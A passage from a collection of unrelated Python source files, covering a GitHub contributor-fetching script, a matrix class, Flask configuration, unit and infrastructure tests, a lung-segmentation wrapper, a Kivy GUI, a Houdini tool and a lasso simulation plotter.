except Exception as exc:
# We want to save what we fetched so far. So pass.
print(' !! ', exc)
try:
merge_all_the_people(current_release, contributors, committers, reporters)
fetch_missing_users_details(contributors)
except FinishedForNow:
# We want to save what we fetched so far. So pass.
print(' !! Committers:', committers)
print(' !! Reporters:', reporters)
exit_status = 1
else:
exit_status = 0
save_awesome_people(contributors)
return exit_status
def find_committers(since: str, until: str) -> FullNames:
url = f'{REPO_URL}/commits'
page = 1
per_page = 100
params = {
'since': since,
'until': until,
'per_page': per_page,
}
committers: FullNames = set()
while 'there are commits':
params['page'] = page
data = fetch(url, params=params)
for item in data:
commit = item['commit']
committers.add(commit['author']['name'])
debug(' >>> Commit', item['html_url'])
for co_author in CO_AUTHORS(commit['message']):
name = co_author.group(1)
committers.add(name)
if len(data) < per_page:
break
page += 1
return committers
def find_reporters(since: str, until: str) -> GitHubLogins:
url = f'{API_URL}/search/issues'
page = 1
per_page = 100
params = {
'q': f'repo:{REPO}/{OWNER} is:issue closed:{since}..{until}',
'per_page': per_page,
}
reporters: GitHubLogins = set()
while 'there are issues':
params['page'] = page
data = fetch(url, params=params)
for item in data['items']:
# Filter out unwanted labels.
if any(label['name'] in SKIPPED_LABELS for label in item['labels']):
continue
debug(' >>> Issue', item['html_url'])
reporters.add(item['user']['login'])
if len(data['items']) < per_page:
break
page += 1
return reporters
def merge_all_the_people(release: str, contributors: People, committers: FullNames, reporters: GitHubLogins) -> None:
"""
>>> contributors = {'Alice': new_person(github='alice', twitter='alice')}
>>> merge_all_the_people('2.6.0', contributors, {}, {})
>>> contributors
{'Alice': {'committed': [], 'reported': [], 'github': 'alice', 'twitter': 'alice'}}
>>> contributors = {'Bob': new_person(github='bob', twitter='bob')}
>>> merge_all_the_people('2.6.0', contributors, {'Bob'}, {'bob'})
>>> contributors
{'Bob': {'committed': ['2.6.0'], 'reported': ['2.6.0'], 'github': 'bob', 'twitter': 'bob'}}
>>> contributors = {'Charlotte': new_person(github='charlotte', twitter='charlotte', committed=['2.5.0'], reported=['2.5.0'])}
>>> merge_all_the_people('2.6.0', contributors, {'Charlotte'}, {'charlotte'})
>>> contributors
{'Charlotte': {'committed': ['2.5.0', '2.6.0'], 'reported': ['2.5.0', '2.6.0'], 'github': 'charlotte', 'twitter': 'charlotte'}}
"""
# Update known contributors.
for name, details in contributors.items():
if name in committers:
if release not in details['committed']:
details['committed'].append(release)
committers.remove(name)
if details['github'] in reporters:
if release not in details['reported']:
details['reported'].append(release)
reporters.remove(details['github'])
# Add new committers.
for name in committers:
user_info = user(fullname=name)
contributors[name] = new_person(
github=user_info['login'],
twitter=user_info['twitter_username'],
committed=[release],
)
if user_info['login'] in reporters:
contributors[name]['reported'].append(release)
reporters.remove(user_info['login'])
# Add new reporters.
for github_username in reporters:
user_info = user(github_username=github_username)
contributors[user_info['name'] or user_info['login']] = new_person(
github=github_username,
twitter=user_info['twitter_username'],
reported=[release],
)
def release_date(release: str) -> str:
date = check_output(['git', 'log', '-1', '--format=%ai', release], text=True).strip()
return datetime.strptime(date, '%Y-%m-%d %H:%M:%S %z').isoformat()
def load_awesome_people() -> People:
try:
with DB_FILE.open(encoding='utf-8') as fh:
return json.load(fh)
except (FileNotFoundError, ValueError):
return {}
def fetch(url: str, params: Optional[Dict[str, str]] = None) -> UserInfo:
headers = {
'Accept': 'application/vnd.github.v3+json',
'Authentication': f'token {GITHUB_TOKEN}'
}
for retry in range(1, 6):
debug(f'[{retry}/5]', f'{url = }', f'{params = }')
with requests.get(url, params=params, headers=headers) as req:
try:
req.raise_for_status()
except requests.exceptions.HTTPError as exc:
if exc.response.status_code == 403:
# 403 Client Error: rate limit exceeded for url: ...
now = int(datetime.utcnow().timestamp())
xrate_limit_reset = int(exc.response.headers['X-RateLimit-Reset'])
wait = xrate_limit_reset - now
if wait > 20:
raise FinishedForNow()
debug(' !', 'Waiting', wait, 'seconds before another try ...')
sleep(wait)
continue
return req.json()
assert ValueError('Rate limit exceeded')
def new_person(**kwargs: str) -> Person:
data = deepcopy(DEFAULT_PERSON)
data.update(**kwargs)
return data
def user(fullname: Optional[str] = '', github_username: Optional[str] = '') -> UserInfo:
if github_username:
url = f'{API_URL}/users/{github_username}'
return fetch(url)
url = f'{API_URL}/search/users'
for query in (f'fullname:{fullname}', f'user:{fullname}'):
params = {
'q': f'repo:{REPO}/{OWNER} {query}',
'per_page': 1,
}
user_info = fetch(url, params=params)
if user_info['items']:
user_url = user_info['items'][0]['url']
return fetch(user_url)
def fetch_missing_users_details(people: People) -> None:
for name, details in people.items():
if details['github'] and details['twitter']:
continue
user_info = user(github_username=details['github'], fullname=name)
if not details['github']:
details['github'] = user_info['login']
if not details['twitter']:
details['twitter'] = user_info['twitter_username']
def save_awesome_people(people: People) -> None:
with DB_FILE.open(mode='w', encoding='utf-8') as fh:
json.dump(people, fh, indent=4, sort_keys=True)
def debug(*args: Any) -> None:
if os.getenv('DEBUG') == '1':
print(*args)
if __name__ == '__main__':
ret = 1
try:
ret = main(*sys.argv[1:])
except TypeError:
ret = 2
print(f'''
Fetch contributors to a release.
Usage:
python {sys.argv[0]} {sys.argv[0]} <RELEASE N-1> <RELEASE N>
Example:
python {sys.argv[0]} 2.4.0 2.5.0
Define the DEBUG=1 environment variable to enable verbose output.
''')
except KeyboardInterrupt:
ret = 255
sys.exit(ret)
|
import Operacije
class Matrika:
def __init__(self, seznam):
self.sez = seznam
def __add__(self, other):
return Operacije.vsota(self.sez, other.sez)
def __sub__(self, other):
nasprotna_vrednost = Operacije.mnozenje_s_skalarjem(other.sez, -1)
return Operacije.vsota(self.sez, nasprotna_vrednost)
def __mul__(self, other):
if type(other) is int:
return Operacije.mnozenje_s_skalarjem(self.sez, other)
else:
return Operacije.produkt(self.sez, other.sez)
def hadamard_product(self, other):
return Operacije.hadamardov_produkt(self.sez, other.sez)
def __pow__(self, potenca):
return Operacije.potenca(self.sez, potenca.sez)
def det(self):
return Operacije.determinanta(self.sez)
def transpose(self):
return Operacije.transponirano(self.sez)
def tr(self):
return Operacije.sled(self.sez)
class Racun:
def __init__(self):
self.dimenzije = {}
self.matrike = {}
self.operacije = {}
def shrani_dimenzije(self, ime, m, n):
self.dimenzije[ime] = [m, n]
def shrani_matriko(self, ime, seznam):
self.matrike[ime] = Matrika(seznam)
def shrani_operacijo(self, ime, operacija):
self.operacije[ime] = operacija
def izvedi_operacijo(self, ime_prve, operacija, ime_druge=None):
mat1 = self.matrike[ime_prve]
if operacija == "det":
return mat1.det()
if operacija == "trace":
return mat1.tr()
if operacija == "transpose":
return mat1.transpose()
mat2 = self.matrike[ime_druge]
if operacija == "plus":
return mat1 + mat2
if operacija == "minus":
return mat1 - mat2
if operacija == "produkt":
return mat1 * mat2
if operacija == "hadamard":
return mat1.hadamard_product(mat2)
if operacija == "potenca":
return mat1 ** mat2
|
"""Default configuration
Use env var to override
"""
import os
ENV = os.getenv("FLASK_ENV")
DEBUG = ENV == "development"
SECRET_KEY = os.getenv("SECRET_KEY")
|
from nose.tools import istest, assert_equal
from precisely import starts_with
from precisely.results import matched, unmatched
@istest
def starts_with_matches_when_actual_string_starts_with_value_passed_to_matcher():
matcher = starts_with("ab")
assert_equal(matched(), matcher.match("ab"))
assert_equal(matched(), matcher.match("abc"))
assert_equal(matched(), matcher.match("abcd"))
assert_equal(unmatched("was 'a'"), matcher.match("a"))
assert_equal(unmatched("was 'cab'"), matcher.match("cab"))
@istest
def starts_with_description_describes_value():
matcher = starts_with("ab")
assert_equal("starts with 'ab'", matcher.describe())
|
# This is currently configured to work with models produced in exploration6.ipynb
# in https://github.com/ebrahimebrahim/lung-seg-exploration
# This wrapper class will handle loading a model and running inference
import monai
import numpy as np
import torch
from .segmentation_post_processing import SegmentationPostProcessing
class SegmentationModel:
def __init__(self, load_path):
"""
This class provides a way to interface with a lung segmentation model trained in MONAI.
It loads the model on construction, and it handles loading and transforming
images and running inference.
"""
model_dict = torch.load(load_path, map_location=torch.device('cpu'))
self.seg_net = model_dict['model']
self.learning_rate = model_dict['learning_rate']
self.training_losses = model_dict['training_losses']
self.validation_losses = model_dict['validation_losses']
self.epoch_number = model_dict['epoch_number']
self.best_validation_loss = model_dict['best_validation_loss']
self.best_validation_epoch = model_dict['best_validation_epoch']
self.image_size = model_dict['image_size']
# Transforms a given image to the input format expected by the segmentation network
self.transform = monai.transforms.Compose([
monai.transforms.CastToType(dtype=np.float32), # TODO dtype should have been included in the model_dict
monai.transforms.AddChannel(),
monai.transforms.Resize(
spatial_size=(self.image_size,self.image_size),
mode = 'bilinear',
align_corners=False
),
monai.transforms.ToTensor()
])
self.seg_post_process = SegmentationPostProcessing()
def run_inference(self, img):
"""
Execute segmentation model on a chest xray, given as an array of shape (height, width).
The image axes are assumed to be in "matrix" order, with the origin in the upper left of the image:
- The 0 axis should go along the height of the radiograph, towards patient-inferior
- The 1 axis should go along the width of the radiograph, towards patient-left/image-right
The segmentation model should include post-processing but this is SKIPPED for now; TODO.
Currently it's just a segmentation network.
Returns (seg_mask, model_to_img_matrix), where:
seg_mask is a torch tensor of shape (height, width), a binary label mask indicating the lung field
model_to_img_matrix is a 2D numpy array representing the linear transform from the coordinate space of the segmentation model
output to the original coordinate space of the given array img.
"""
if len(img.shape) != 2:
raise ValueError("img must be a 2D array")
self.seg_net.eval()
img_input = self.transform(img)
seg_net_output = self.seg_net(img_input.unsqueeze(0))[0]
# assumption at the moment is that we have 2-channel image out (i.e. purely binary segmentation was done)
assert(seg_net_output.shape[0]==2)
_, max_indices = seg_net_output.max(dim=0)
seg_mask = (max_indices==1).type(torch.uint8)
model_to_img_matrix = np.diag(np.array(img.shape)/self.image_size)
return seg_mask, model_to_img_matrix # TODO returning early because post processing causes crash due to ITK python issues
seg_processed = self.seg_post_process(seg_mask)
return seg_processed, model_to_img_matrix
|
"""Graphical User Interface for the application that is done by kivy graphics library."""
import os
import signal
import socket
import subprocess
from subprocess import Popen
import webbrowser
from pathlib import Path
import datetime as dt
import threading
import kivy
kivy.require('1.10.1')
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.label import Label
from kivy.clock import Clock
from kivy.properties import StringProperty, ObjectProperty
from kivy.uix.button import Button
from kivy.uix.popup import Popup
from kivy.lang import Builder
import clean_debug_stream as cleaner
import dash_plotter_function as dp
class LoadDialog(Screen):
clean_data = StringProperty("")
def load(self, file_selection):
self.clean_data = os.path.join(
os.path.dirname(__file__),
"Cleaned Data",
"clean_data_"\
+ dt.datetime.now().strftime("%d_%m_%Y_%H_%M_%S")
)
_, channels = cleaner.clean_terminal_data_stream(
file_selection[0],
self.clean_data
)
dp.initialize_layout(self.clean_data, channels)
t = threading.Thread(target=dp.app.run_server)
t.daemon = True
t.start()
self.manager.current = "result"
class ResultScreen(Screen):
ip_adr = socket.gethostbyname(socket.gethostname())
label_text = StringProperty()
data_file_text = StringProperty("")
def __init__(self, **kwargs):
super().__init__(**kwargs)
Clock.schedule_interval(self.check_ip, 1)
def check_ip(self, dt):
"""This function is used to update ip address on the text link."""
self.ip_adr = socket.gethostbyname(socket.gethostname())
self.label_text = (
'Data has been cleaned! Go to the address '
'[ref=addr][u]http://127.0.0.1:8050[/u][/ref]'
' to view the drive data.\n'
'Clicking the link opens the browser to view the data. '
'Data is also saved to\n' + self.data_file_text
)
def webopen(self):
"""
This is used to open web browser when clicking hyperlink.
See drivedata.kv.
"""
webbrowser.open_new('http://127.0.0.1:8050')
class DriveDataApp(App):
"""
Application to process KONE drive data.
See driverdata.kv for implementation.
"""
if __name__ == '__main__':
#process = MonitoringProcess()
DriveDataApp().run()
|
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ["MOLECULE_INVENTORY_FILE"]
).get_hosts("all")
def test_nginx_installed(host):
nginx = host.package("rh-nginx18")
assert nginx.is_installed
def test_nginx_config_exists(host):
nginx_config = host.file("/etc/opt/rh/rh-nginx18/nginx/nginx.conf")
assert nginx_config.exists
assert nginx_config.is_file
assert nginx_config.user == "root"
assert nginx_config.group == "root"
def test_nginx_vhost_example_exists(host):
nginx_vhost = host.file("/etc/opt/rh/rh-nginx18/nginx/nginx.conf")
assert nginx_vhost.exists
assert nginx_vhost.is_file
assert nginx_vhost.user == "root"
assert nginx_vhost.group == "root"
def test_nginx_listening_http(host):
socket = host.socket("tcp://0.0.0.0:80")
assert socket.is_listening
|
import hou
import nodegraph
def getRunning():
return hou.session.scRunning
def setRunning(input):
hou.session.scRunning = input
def getLast():
return hou.session.scLastNode
def setLast(node):
hou.session.scLastNode = node
def getCurrent():
return hou.session.scCurrentNode
def setCurrent(node):
hou.session.scCurrentNode = node
def initVariables():
hou.ui.removeAllSelectionCallbacks()
hou.session.scRunning = None
hou.session.scCurrentNode = None
hou.session.scLastNode = None
hou.ui.addSelectionCallback(selectionCallback)
setRunning(1)
def selectionCallback(selection):
try:
if (len(selection)>0):
#print(selection)
#print("length ", len(selection))
#print("lastNode", getLast())
if (getCurrent()!=None):
setLast(getCurrent())
setCurrent(selection)
except:
print("An Selection exception occurred")
def connectByHeight(node1, node2):
#print("connectByHeight")
if sameParents(node1, node2) == True:
if (node1.position()[1]>node2.position()[1]):
setCurrent([node2])
setLast([node1])
else:
setCurrent([node1])
setLast([node2])
connectByLastSelection()
def sameParents(node1, node2):
if node1.parent().name()==node2.parent().name():
return True
else:
return False
def connectByLastSelection():
#print("connectByLastSelection")
last = getLast()[0]
current = getCurrent()[0]
if (last!=None and current!=None):
if sameParents(last, current) == True:
if ( len(last.outputConnectors())>0 and len(current.inputConnectors())>0):
pos = switchInput(current, last)
current.setInput(pos, last, 0)
def switchInput(current, last):
#print("switchInput")
found=-1
for ele in current.inputConnections():
if (ele.inputNode().name() == last.name()):
found = ele.inputIndex()
current.setInput(found, None, 0)
#print("already connected")
if len(current.inputConnectors())>=found+2:
found += 1
else:
found = 0
break
if found<0:
found = 0
return found
if kwargs['ctrlclick'] or kwargs['cmdclick']:
#RESET
initVariables()
#print("reset")
else:
try:
if getRunning():
#CALLBACK is running
if len(getCurrent())>1:
connectByHeight(getCurrent()[0], getCurrent()[1])
else:
connectByLastSelection()
else:
#print("start")
#START CALLBACK
initVariables()
except:
initVariables()
|
import sys
from pyxb.exceptions_ import ValidationError
import qsdl.parser.config01 as configPYXB
from qsdl.parser.parsedConfig import ConfigDescriptor
import qsdl.simulator.simulationRunner as simulationRunner
import qsdl.parser.cliParser as cliParser
import matplotlib as matplotlib
# Use a non-interactive matplotlib backend to allow running in command line env.
matplotlib.use('AGG')
import figures as figures
from qsdl.simulator.errors.ConfigurationInvalidError import ConfigurationInvalidError
from qsdl.simulator.errors.CallbackError import CallbackError
def plot_cross_session_figures( sessions, costIncrement, gainIds ):
figures.plotAverageGainsAtRankAcrossSessions( sessions )
figures.plotAverageGainsAtCostAcrossSessions( sessions, costIncrement )
figures.plotDerivedGainsAcrossSessions( sessions, gainIds, costIncrement )
DEFAULT_COST_INCREMENT = 10
configName = cliParser.get_config_file_name()
confDesc = None
try:
confDesc = ConfigDescriptor( configPYXB.CreateFromDocument(
file(configName).read()) )
except IOError as e:
sys.stderr.write( 'ERROR: Configuration file or a file referenced in the config is inaccessible.\n' )
sys.stderr.write(e.strerror + ' - ' + e.filename + '\n')
sys.exit(1)
except ValidationError as e:
sys.stderr.write( 'ERROR: Validation of configuration file (' + configName + ') failed.\n' )
sys.stderr.write(e.details() + '\n')
sys.exit(1)
try:
for runId in confDesc.get_run_id_iterator():
figures.set_run_id(runId)
sessions = simulationRunner.run_sessions( confDesc, runId )
confDesc.get_cross_session_output_writer( sessions, runId )()
figures.set_output_directory( confDesc.get_cross_session_output_directory() )
plot_cross_session_figures( sessions, DEFAULT_COST_INCREMENT, confDesc.get_default_derived_gains_dict().keys() )
if not confDesc.only_cross_session_output():
for simulationIterations in sessions:
confDesc.get_output_writer( simulationIterations, confDesc.get_random_seed(), configName, runId )()
sessid = str(simulationIterations[0].get_session_id())
figures.set_output_directory( confDesc.get_output_directory( sessid ) )
figures.plotGainsAtRank( simulationIterations )
figures.plotGainsAtCost(simulationIterations, DEFAULT_COST_INCREMENT)
figures.plotDerivedGains(simulationIterations, confDesc.get_derived_gains_dict( sessid ).iterkeys(), DEFAULT_COST_INCREMENT)
figures.plotCostsAtRank(simulationIterations)
figures.plotCustomFigures(simulationIterations, confDesc.get_custom_figures_dict(sessid))
except ValidationError as e:
sys.stderr.write( 'ERROR: Invalid content found in simulation description.\n' )
sys.stderr.write(e.details() + '\n')
sys.exit(1)
except ConfigurationInvalidError as e:
sys.stderr.write( 'ERROR: Invalid configuration detected. Please check configuration file.\n' )
sys.stderr.write( 'ERROR: ' + str(e) + '\n')
sys.exit(1)
except CallbackError as e:
sys.stderr.write( 'ERROR: Invalid callback configuration detected.\n' )
sys.stderr.write( 'ERROR: ' + str(e) + '\n')
sys.exit(1)
|
import numpy as np
import matplotlib.pyplot as plt
from simulator_ic import simul
from solar_parallel import solar
from tqdm import tqdm
########################################################################
# define the class 'the simulation_plot' for irrepresentable condition #
########################################################################
'''
this class is used for plotting the result of IRC example
Check this before you run the code:
Plz check if you have 'sci-kit learn', 'numpy', 'matplotlib' and 'tqdm' installed. If not,
1. run 'pip install scikit-learn numpy matplotlib tqdm' if you use pure Python3
2. run 'conda install scikit-learn numpy matplotlib tqdm' if you use Anaconda3
Modules:
1. from scikit-learn, we call 'LassoLarsCV' and 'LassoCV' for cv-lars-lasso and cv-cd respectively;
2. we use 'numpy' for matrix computation and random variable generation;
3. for 'simulator_ic', 'solar' and 'costcom', plz see 'simulator_ic.py', 'solar.py' and 'costcom.py' for detail;
4. 'tqdm' is used to construct the progress bar;
5. we use 'matplotlib' to plot all figures;
Inputs:
1. X and Y : the inputs and output of regression
2. sample_size : the total sample size we generate for cv-lars-lasso, cv-cd and solar
3. n_dim : the number of total variables in X
4. n_info : number of non-zero regression coefficients in data-generating process
5. n_repeat : the number of subsamples in solar
6. num_rep : the number of repeatitions
7. step_size : step size for tuning the value of c for solar;
8. rnd_seed : the random seed
9. plot_on : binary, whether the plot will be saved as pdf
Outputs:
1. solar_coef_stack: the stack of solar regression coefficients in 200 repeats
2. opt_c_stack : the stack of values of c* in 200 repeats
3. Q_opt_c_stack : the stack of Q(c*) in 200 repeats
4. la_array_stack : the stack of number of variables selected by CV-lars-lasso in 200 repeats
5. la_var_stack : the stack of the variables selected by CV-lars-lasso in 200 repeats
6. cd_array_stack : the stack of number of variables selected by CV-cd in 200 repeats
7. cd_var_stack : the stack of the variables selected by CV-cd in 200 repeats
Remarks:
1. In each round of subsampling, we randomly take out 1/K points out of the sample and make the rest as the subsample in this round
2. As competitors, we use X and Y for LassoLarsCV (called CV-lars-lasso in paper) and LassoCV (called CV-cd in paper) estimation, which relies on 10-fold CV.
'''
class simul_plot:
def __init__(self, sample_size, n_dim, n_info, coef_1, coef_2, n_repeat, num_rep, step_size, rnd_seed, plot_on):
##for convinience, we define the common variable (variables we need to use multiple times) in the class as follows (xxxx as self.xxxx)
#define the paras
self.sample_size = sample_size #sample size
self.n_dim = n_dim #the number of total variables in X
self.n_info = n_info #number of non-zero regression coefficients in data-generating process
self.n_repeat = n_repeat #the number of subsamples generated in solar
self.num_rep = num_rep #the number of repeatitions in Simulation 1, 2 and 3
self.step_size = step_size #step size for tuning the value of c for solar
self.rnd_seed = rnd_seed #the random seed for reproduction
self.coef_1 = coef_1 #the value of omega in data-generating process
self.coef_2 = coef_2 #the value of omega in data-generating process
self.coef_t = coef_1 + coef_2 #if this value is less than 1 (omega is positive in our simulation), irrepresentable condition is not violated
self.plot_on = plot_on #whether the plot will be saved as pdf
def simul_func(self):
#compute 200 repeats of solar vs cv-lars-lasso and cv-cd
opt_c_stack = list() #the stack of values of c* in 200 repeats
Q_opt_c_stack = list() #the stack of Q(c*) in 200 repeats
la_array_stack = list() #the stack of number of variables selected by CV-lars-lasso in 200 repeats
la_var_stack = list() #the stack of the variables selected by CV-lars-lasso in 200 repeats
cd_array_stack = list() #the stack of number of variables selected by CV-cd in 200 repeats
cd_var_stack = list() #the stack of the variables selected by CV-cd in 200 repeats
solar_coef_stack = list() #the stack of solar regression coefficients in 200 repeats
abs_ic_stack = list() #the stack of empirical value of mu (defined alongwide with irrepresentable condition (Section 2.1)) in each sample (across 200 repeats)
#to make parallel computing replicable, set random seeds
np.random.seed(self.rnd_seed)
# Spawn off 200 child SeedSequences to pass to child processes.
seeds = np.random.randint(1e8, size=self.num_rep)
##use for-loop to compute 200 repeats
#use 'tqdm' in for loop to construct the progress bar
for i in tqdm(range(self.num_rep)):
np.random.seed(seeds[i])
#if irrepresentable condition is violated in population, break
if self.coef_t > 1:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
break
#1. call the class 'simul' from 'simul.py'
trial1 = simul(self.sample_size, self.n_dim, self.n_info, self.coef_1, self.coef_2)
#2. generate X and Y in each repeat
X, Y, abs_ic = trial1.data_gen()
#3. call the class 'solar' from 'solar.py'
trial2 = solar( X, Y, self.n_repeat, self.step_size, lasso = True)
#4. compute solar, cv-lars-lasso and cv-cd on X and Y
solar_coef, opt_c, test_error, Qc_list, Q_opt_c, la_list, la_vari_list, cd_list, cd_vari_list = trial2.fit()
#5. find Q(c*) for solar
min_loc_val = np.where(test_error == min(test_error))[0]
Q_opt_c = Qc_list[max(min_loc_val)]
#6. save the value of c* (opt_c) into 'opt_c_stack' (the stack of 'the value of c* of solar' in 200 repeats)
opt_c_stack.append(max(opt_c))
#7. save Q(c*) (Q_opt_c) into 'Q_opt_c_stack' (the stack of 'variables selected by solar' in 200 repeats)
Q_opt_c_stack.append(Q_opt_c)
#8. save the number of variables selected by cv-lars-lasso (la_list) into 'la_array_stack' (the stack of 'number of variables selected by cv-lars-lasso' in 200 repeats)
la_array_stack.append(la_list)
#9. save the variables selected by cv-lars-lasso (la_vari_list) into 'la_var_stack' (the stack of 'variables selected by cv-lars-lasso' in 200 repeats)
la_var_stack.append(la_vari_list)
#10. save the number of variables selected by cv-cd (cd_list) into 'cd_array_stack' (the stack of 'number of variables selected by CV-cd' in 200 repeats)
cd_array_stack.append(cd_list)
#11. save the variables selected by cv-cd (cd_vari_list) into 'cd_var_stack' (the stack of 'variables selected by CV-cd' in 200 repeats)
cd_var_stack.append(cd_vari_list)
#12. save solar regression coefficients (solar_coef) into 'solar_coef_stack' (the stack of 'solar regression coefficents' in 200 repeats)
solar_coef_stack.append(solar_coef)
abs_ic_stack.append(abs_ic)
return opt_c_stack, Q_opt_c_stack, la_array_stack, la_var_stack, solar_coef_stack, abs_ic_stack, cd_array_stack, cd_var_stack
def vari_hist(self, Q_opt_c_stack, la_array_stack, cd_array_stack):
#the histogram of number of variables selected : solar vs competitors
if self.coef_t <= 1:
#use 'solar_len_array' to record the number of variables selected by solar in each repeat
solar_len_array = np.empty([len(Q_opt_c_stack)])
#count the number of variables selected by solar in each repeat by computing the length (number of elements) of Q(c) in each repeat
for i in range(len(Q_opt_c_stack)):
solar_len_array[i] = len(Q_opt_c_stack[i])
##overlaid histogram plot of num_var_selected: solar vs CV-cd
f11 = plt.figure()
#histogram plot of solar and CV-cd
plt.hist(solar_len_array, 20, density = True, alpha=0.8, color = "dodgerblue", label='Number of variables selected by solar')
plt.hist(cd_array_stack, 20, density = True, alpha=0.65, color = "lawngreen", label='Number of variables selected by CV-cd ')
#plot vertical lines for the mean of solar and cv-cd (and report them as legend)
plt.axvline(x=np.mean(solar_len_array), linewidth=2.5, color='b',label='solar mean')
plt.gcf().text(1, 1, 'mean for solar : ' + str(np.mean(solar_len_array)))
plt.axvline(x=np.mean(cd_array_stack), linewidth=2.5, color='g',label='CV-cd mean')
plt.gcf().text(1, 0.9, 'mean for CV-cd : ' + str(np.mean(cd_array_stack)))
#plot vertical lines for the median of solar and cv-cd (and report them as legend)
plt.axvline(x=np.median(solar_len_array), linewidth=2.5, color='b', ls =':', label='solar median')
plt.gcf().text(1, 0.85, 'median for solar : ' + str(np.median(solar_len_array)))
plt.axvline(x=np.median(cd_array_stack), linewidth=2.5, color='g', ls =':', label=' CV-cd median')
plt.gcf().text(1, 0.75, 'median for CV-cd : ' + str(np.median(la_array_stack)))
#legend of histogram plot
plt.legend(loc=9, bbox_to_anchor=(0.5, -0.2), borderaxespad=0., ncol=3, shadow=True)
plt.xlabel('number of variables selected', fontsize=16)
plt.xlim(3,30)
plt.ylim(0,0.6)
plt.ylabel('Density', fontsize=16)
plt.title('solar vs CV-cd : sparsity', fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.grid(True)
plt.show()
#output it into pdf
if self.plot_on == True:
f11.savefig("./figure/sparsity_plot_ic_"+str(self.coef_1)+"_vs_CVcd.pdf", bbox_inches='tight')
##overlaid hist plot of num_var_selected: solar vs CV-lars-lasso
f1 = plt.figure()
#histogram plot of solar and CV-lars-lasso
plt.hist(solar_len_array, 20, density = True, alpha=0.8, color = "dodgerblue", label='Number of variables selected by solar')
plt.hist(la_array_stack, 20, density = True, alpha=0.65, color = "orange", label='Number of variables selected by CV-lars-lasso')
#plot vertical lines for the mean of solar and CV-lars-lasso (and report them as legend)
plt.axvline(x=np.mean(solar_len_array), linewidth=2.5, color='b',label='solar mean')
plt.gcf().text(1, 1, 'mean for solar : ' + str(np.mean(solar_len_array)))
plt.axvline(x=np.mean(la_array_stack), linewidth=2.5, color='r',label='CV-lars-lasso mean')
plt.gcf().text(1, 0.95, 'mean for CV-lars-lasso : ' + str(np.mean(la_array_stack)))
#plot vertical lines for the median of solar and CV-lars-lasso (and report them as legend)
plt.axvline(x=np.median(solar_len_array), linewidth=2.5, color='b', ls =':', label='solar median')
plt.gcf().text(1, 0.85, 'median for solar : ' + str(np.median(solar_len_array)))
plt.axvline(x=np.median(la_array_stack), linewidth=2.5, color='r', ls =':', label=' CV-lars-lasso median')
plt.gcf().text(1, 0.8, 'median for CV-lars-lasso : ' + str(np.median(la_array_stack)))
#legend
plt.legend(loc=9, bbox_to_anchor=(0.5, -0.2), borderaxespad=0., ncol=3, shadow=True)
plt.xlabel('number of variables selected', fontsize=16)
plt.xlim(3,30)
plt.ylim(0,0.6)
plt.ylabel('Density', fontsize=16)
plt.title('solar vs CV-lars-lasso : sparsity', fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.grid(True)
plt.show()
#output it into pdf
if self.plot_on == True:
f1.savefig("./figure/sparsity_plot_ic_"+str(self.coef_1)+"_vs_CVlars.pdf", bbox_inches='tight')
#count how many repeats solar select 5 variables
print("in " + str(np.count_nonzero(solar_len_array- 5)) + " out of " + str(self.num_rep) + " solar pick more/less than 5 variables")
#count how many repeats CV-lars-lasso select 5 variables
print("in " + str(np.count_nonzero(np.array(la_array_stack) - 5)) + " out of " + str(self.num_rep) + " CV-lars-lasso pick more/less than 5 variables")
#count how many repeats CV-cd select 5 variables
print("in " + str(np.count_nonzero(np.array(cd_array_stack) - 5)) + " out of " + str(self.num_rep) + " CV-cd pick more/less than 5 variables")
#if the irrepresentable condition is violated
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
def q_hist(self, opt_c_stack):
#histogram plot of c* of solar in 200 repeatss
if self.coef_t <= 1:
f2 = plt.figure()
plt.hist(opt_c_stack, facecolor='r', alpha=0.75)
plt.xlabel('c*', fontsize=16)
plt.ylabel('Frequency', fontsize=16)
plt.title('histogram of c* selected by solar among 200 repeats', fontsize=16)
plt.grid(True)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.tight_layout()
plt.show()
if self.plot_on == True:
f2.savefig("./figure/q-values_plot_ic_"+str(self.coef_1)+".pdf", bbox_inches='tight')
#if the irrepresentable condition is violated
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
def acc_plot(self, Q_opt_c_stack, la_var_stack, cd_var_stack, num_var_to_plot, print_true):
#bar plot: probability of solar/cv-lars-lasso/cv-cd selecting each variable (all 5 informative variables; redundant variables (of top 35 probability))
if self.coef_t <= 1:
#prepare the bar plot of solar
#1. first we concatenate 'Q_opt_c_stack' (the stack of indices of variables selected by solar among 200 repeats) into one whole array ('solar_vari_appe_stack')
solar_vari_appe_stack = np.concatenate(Q_opt_c_stack,0)
#2. set 'solar_plot_stack' as the placeholder of the probailities of selecting each variable by solar (ranking in decreasing order)
solar_plot_stack = list()
#3. set 'solar_x_axi' as the label of variable names (from x_0 to x_p, where p is the number of variables in X)
solar_x_axi = np.arange(0, self.n_dim)
#prepare the bar plot of CV-lars-lasso
#1. first we concatenate 'la_var_stack' (the stack of indices of variables selected by cv-lars-lasso among 200 repeats) into one whole array ('l_vari_appe_stack')
l_vari_appe_stack = np.concatenate(la_var_stack,0)
#2. set 'l_plot_stack' as the container of the probailities of selecting each variable by cv-lars-lasso (ranking in decreasing order)
l_plot_stack = list()
#3. set 'l_x_axi' as the array of variable names (from x_0 to x_p, where p is the number of variables in X)
l_x_axi = np.arange(0,self.n_dim)
#prepare the bar plot of CV-cd
#1. first we concatenate 'cd_var_stack' (the stack of indices of variables selected by cv-cd) into one whole array ('cd_vari_appe_stack')
cd_vari_appe_stack = np.concatenate(cd_var_stack,0)
#2. set 'cd_plot_stack' as the container of the probailities of selecting each variable by cv-cd (ranking in decreasing order)
cd_plot_stack = list()
#3. set 'cd_x_axi' as the array of variable names (from x_0 to x_p, where p is the number of variables in X)
cd_x_axi = np.arange(0,self.n_dim)
